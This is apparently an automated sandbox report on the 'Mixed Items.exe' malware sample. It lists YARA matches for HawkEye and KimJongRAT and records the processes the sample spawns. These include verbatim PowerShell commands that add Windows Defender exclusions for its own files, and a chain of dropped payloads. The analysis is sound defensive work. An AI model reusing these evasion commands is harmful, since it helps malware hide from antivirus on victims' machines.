                        Source: 30.2.hawkgoods.exe.2be8a9c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.300a1c4.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.7aa0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@52/33@22/7
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D84E52 AdjustTokenPrivileges,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D84E1B AdjustTokenPrivileges,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\WindowsAPIJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467Jump to behavior
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: Mixed Items.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\Mixed Items.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                        Source: C:\Users\user\Desktop\Mixed Items.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: hawkgoods.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: hawkgoods.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: hawkgoods.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: hawkgoods.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: Mixed Items.exeReversingLabs: Detection: 17%
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Users\user\Desktop\Mixed Items.exe:Zone.IdentifierJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe 'C:\Users\user\Desktop\Mixed Items.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
